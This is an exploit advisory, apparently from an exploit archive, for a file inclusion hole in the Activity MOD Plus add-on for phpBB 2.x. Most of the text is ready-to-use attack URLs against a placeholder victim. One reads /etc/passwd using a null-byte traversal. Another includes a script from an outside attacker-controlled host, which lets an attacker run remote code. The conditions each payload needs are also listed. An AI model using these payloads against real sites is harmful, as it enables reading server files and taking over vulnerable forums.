id: 460
date: 05/27/2006
title: Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability
author: nukedx
cves: 

===================================================================
Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability
===================================================================




phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
This exploits works on phpBB 2.x (Activity MOD Plus)

Succesful exploitation needs register_globals on
GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
Requires magic_quotes_gpc off
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
Requires allow_url_fopen on



#  0day.today [2023-03-24]  #